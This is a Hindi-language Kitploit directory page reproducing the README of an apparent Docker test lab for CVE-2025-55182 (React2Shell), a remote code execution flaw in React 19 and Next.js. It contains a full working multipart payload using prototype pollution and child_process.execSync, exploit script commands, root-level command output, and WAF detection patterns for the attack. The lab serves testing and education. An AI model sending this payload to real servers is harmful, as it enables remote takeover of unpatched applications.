Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-55182-test-lab-windows — Docker-आधारित परीक्षण प्रयोगशाला CVE-2025-55182 (React2Shell) RCE भेद्यता के लिए जो React 19.1.0/Next.js 15.1.0 में है। इसमें एक्सप्लॉइट स्क्रिप्ट्स, NGINX/ModSecurity के साथ WAF बाईपास परीक्षण, और सुरक्षा शिक्षा के लिए पैच किए गए संस्करण की तुलना शामिल है। | Kitploit
उपकरण/GitHubGitHub/fankh/cve-2025-55182-test-lab-windows
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubfankh/cve-2025-55182-test-lab-windows

cve-2025-55182-test-lab-windows

Docker-आधारित परीक्षण प्रयोगशाला CVE-2025-55182 (React2Shell) RCE भेद्यता के लिए जो React 19.1.0/Next.js 15.1.0 में है। इसमें एक्सप्लॉइट स्क्रिप्ट्स, NGINX/ModSecurity के साथ WAF बाईपास परीक्षण, और सुरक्षा शिक्षा के लिए पैच किए गए संस्करण की तुलना शामिल है।

रिपॉजिटरी देखें
149 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 (React2Shell) परीक्षण

⚠️ चेतावनी: इसमें वास्तविक रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी शामिल है।

📋 सामग्री सूची

  • अवलोकन
  • कमजोरी की जानकारी
  • त्वरित शुरुआत
  • वास्तविक हमले का प्रदर्शन
  • परीक्षण वातावरण
  • WAF सुरक्षा नियम
  • फ़ाइल संरचना
  • संदर्भ सामग्री
  • कानूनी नोटिस

अवलोकन

CVE-2025-55182 (React2Shell) कमजोरी परीक्षण के लिए कंटेनर परीक्षण वातावरण।

मुख्य विशेषताएँ

  • ✅ वास्तविक कमजोरी पुनरुत्पादन - React 19.1.0 / Next.js 15.1.0 वातावरण
  • ✅ RCE हमला सफल - वास्तविक कमांड निष्पादन की पुष्टि
  • ✅ WAF सुरक्षा परीक्षण - NGINX और Apache ModSecurity नियम सेटअप
  • ✅ पैच संस्करण तुलना - कमजोर संस्करण बनाम पैच संस्करण परीक्षण
  • ✅ पूर्ण Docker वातावरण - पृथक कंटेनर वातावरण

हमले का परिणाम

🔴 CRITICAL VULNERABILITY CONFIRMED!
   Successfully executed 6/7 commands

Executed Commands:
  ✅ whoami: root
  ✅ hostname: c89f1bd355b2
  ✅ pwd: /app
  ✅ id: uid=0(root) gid=0(root) groups=0(root)...
  ✅ uname: Linux c89f1bd355b2 6.6.87.2-microsoft-standard-WSL2...
  ✅ node-ver: v20.19.6

कमजोरी की जानकारी

CVE-2025-55182 (React2Shell)

CVSS स्कोर: 10.0 (CRITICAL)
प्रभाव: रिमोट कोड एक्ज़ीक्यूशन (RCE)
प्रमाणीकरण आवश्यकता: नहीं
हमला वेक्टर: नेटवर्क

कमजोर संस्करण

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: < 15.0.5, < 15.1.9, < 15.2.6, < 15.3.6, < 15.4.8, < 15.5.7, < 16.0.7

पैच किए गए संस्करण

  • React: 19.1.2+
  • Next.js: 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, 16.0.7+

हमला सिद्धांत

  1. Prototype Pollution - $1:__proto__:then के माध्यम से प्रोटोटाइप प्रदूषण
  2. फंक्शन कंस्ट्रक्टर तक पहुँच - Blob डीसीरियलाइज़ेशन ($B उपसर्ग) के माध्यम से
  3. मनमाना कोड निष्पादन - हमलावर द्वारा नियंत्रित कोड से फंक्शन निर्माण
  4. सिस्टम कमांड निष्पादन - child_process के माध्यम से RCE
// हमले के पेलोड की संरचना
{
  "then": "$1:__proto__:then",           // Object.prototype.then प्रदूषण
  "status": "resolved_model",
  "reason": -1,
  "value": '{"then": "$B0"}',            // Blob डीसीरियलाइज़ेशन ट्रिगर
  "_response": {
    "_prefix": "दुर्भावनापूर्ण_कोड",      // निष्पादित करने का कोड
    "_formData": {
      "get": "$1:constructor:constructor"  // फंक्शन कंस्ट्रक्टर तक पहुँच
    }
  }
}

त्वरित शुरुआत

पूर्व आवश्यकताएँ

  • Docker Desktop
  • Node.js 20+ (स्थानीय परीक्षण के लिए, वैकल्पिक)
  • न्यूनतम 4GB RAM
  • 2GB या अधिक खाली डिस्क स्थान

चरण 1: वातावरण शुरू करें

Windows (PowerShell):

PowerShell -ExecutionPolicy Bypass -File .\run-tests.ps1 start

चरण 2: स्थिति जाँचें

.\run-tests.ps1 status

सभी कंटेनरों के healthy स्थिति में आने तक प्रतीक्षा करें (लगभग 1-2 मिनट लगते हैं)।

चरण 3: हमला चलाएँ

Windows (PowerShell):

# विधि 1: PowerShell स्क्रिप्ट का उपयोग (अनुशंसित)
.\tests\exploit-working.ps1

# विधि 2: Node.js सीधे चलाएँ
node tests\exploit-working.js

### चरण 4: परिणाम जाँचें

सर्वर लॉग में कमांड निष्पादन परिणाम देखे जा सकते हैं:

```bash
docker compose logs vulnerable-app --tail=20

हमले का प्रदर्शन

स्वचालित हमला स्क्रिप्ट

exploit-working.js ⭐ अनुशंसित

Windows:

# PowerShell स्क्रिप्ट (अनुशंसित)
.\tests\exploit-working.ps1

# या Node.js सीधे चलाएँ
node tests\exploit-working.js

निष्पादन सामग्री:

  • ✅ मनमाना शेल कमांड निष्पादन
  • ✅ सर्वर लॉग में कमांड आउटपुट कैप्चर
  • ✅ कई कमांड का स्वचालित परीक्षण
  • ✅ विस्तृत कमजोरी रिपोर्ट प्रदान करता है

परीक्षण किए जाने वाले कमांड:

  • whoami - वर्तमान उपयोगकर्ता (root)
  • hostname - कंटेनर होस्टनाम
  • pwd - कार्यशील निर्देशिका (/app)
  • id - पूर्ण उपयोगकर्ता जानकारी
  • uname -a - सिस्टम जानकारी
  • node --version - Node.js संस्करण

मैन्युअल हमला

curl का उपयोग करके सीधा हमला

# पेलोड फ़ाइल बनाएँ
cat > payload.txt << 'EOF'
------WebKitFormBoundary123
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\": \"$B0\"}","_response":{"_prefix":"console.log('[EXPLOIT] RCE Success');const result=require('child_process').execSync('whoami').toString();console.log('[RESULT]',result);","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundary123
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundary123--
EOF

# हमला भेजें
curl -X POST http://localhost:3000/ \
  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123" \
  -H "Next-Action: exploit" \
  --data-binary @payload.txt

# लॉग निष्पादन जाँचें
docker compose logs vulnerable-app --tail=20 | grep -E "\[EXPLOIT\]|\[RESULT\]"

कस्टम कमांड निष्पादन

हमला स्क्रिप्ट को संशोधित करके वांछित कमांड चलाए जा सकते हैं:

// exploit-working.js फ़ाइल में:
const tests = [
  { name: 'custom', cmd: 'ls -la /app', desc: 'एप्लिकेशन निर्देशिका सूची' },
  { name: 'env', cmd: 'printenv', desc: 'पर्यावरण चर आउटपुट' }
]

परीक्षण वातावरण

Docker कंटेनर

पोर्टसेवाReact संस्करणउपयोगWAF स्थिति
3000vulnerable-app19.1.0कमजोर - CVE-2025-55182 परीक्षण❌ कोई सुरक्षा नहीं
3001patched-app19.1.2सुरक्षित - पैच प्रभाव सत्यापन✅ पैच किया गया
8080nginx → vulnerable19.1.0WAF परीक्षण (NGINX)⚠️ सीमित (बॉडी जाँच नहीं)
8081apache → vulnerable19.1.0WAF परीक्षण (ModSecurity)⚠️ सीमित (405 प्रतिक्रिया)
8082nginx → patched19.1.2दोहरी सुरक्षा परीक्षण✅ पैच किया गया

एप्लिकेशन वातावरण

  • फ्रेमवर्क: Next.js 15.1.0 (App Router)
  • React संस्करण: 19.1.0 (कमजोर)
  • Node.js: 20.19.6

परीक्षण परिदृश्य

परिदृश्य 1: कमजोर संस्करण पर हमला

# कार्यशील हमला चलाएँ
node tests/exploit-working.js

# अपेक्षित परिणाम: कमांड निष्पादन सफल
# आउटपुट: उपयोगकर्ता जानकारी, सिस्टम विवरण आदि

परिदृश्य 2: पैच किए गए संस्करण का परीक्षण

Windows (PowerShell):

# PowerShell स्क्रिप्ट का उपयोग
.\tests\exploit-working.ps1 -Port 3001

अपेक्षित परिणाम: हमला विफल (React 19.1.2 हमले को रोकता है)

परिदृश्य 3: WAF अवरोध परीक्षण

Windows (PowerShell):

# NGINX WAF के माध्यम से हमला प्रयास
.\tests\exploit-working.ps1 -Port 8080

अपेक्षित परिणाम: WAF नियमों द्वारा अवरुद्ध


WAF सुरक्षा नियम

NGINX सुरक्षा नियम

स्थान: nginx/nginx.conf

पहचान पैटर्न:

  1. Prototype Pollution - __proto__, constructor:constructor
  2. Flight Protocol दुरुपयोग - $X:__proto__, $B संदर्भ
  3. Gadget Chain - child_process, execSync, require()
  4. URL Encoding बाईपास - %5f%5fproto%5f%5f
  5. संदिग्ध हेडर - Next-Action: #constructor

अवरोध क्रिया:

HTTP 403 Forbidden
{
  "error": "Request blocked by WAF",
  "protection": "CVE-2025-55182",
  "waf": "NGINX"
}

Apache ModSecurity नियम

स्थान: apache/modsecurity-rules.conf

नियम ID सीमा: 100001-100017

मुख्य नियम:

  • 100001: __proto__ पहचान
  • 100002: Constructor chain पहुँच
  • 100003-100004: Flight protocol दुरुपयोग
  • 100006-100007: Gadget chain पैटर्न
  • 100008-100011: RCE प्रयास (child_process, exec, spawn, require)
  • 100015: संदिग्ध Next-Action हेडर
  • 100017: असामान्य स्कोर-आधारित अवरोध

WAF परीक्षण

# NGINX अवरोध परीक्षण
curl -X POST http://localhost:8080/ \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"polluted": true}}'

# अपेक्षित प्रतिक्रिया: HTTP 403

# ModSecurity अवरोध परीक्षण
curl -X POST http://localhost:8081/ \
  -H "Next-Action: test#constructor" \
  -d '{"data": "test"}'

# अपेक्षित प्रतिक्रिया: HTTP 403

WAF लॉग जाँच

# NGINX सुरक्षा लॉग
docker compose exec nginx tail -f /var/log/nginx/security.log
टूल डाउनलोड करें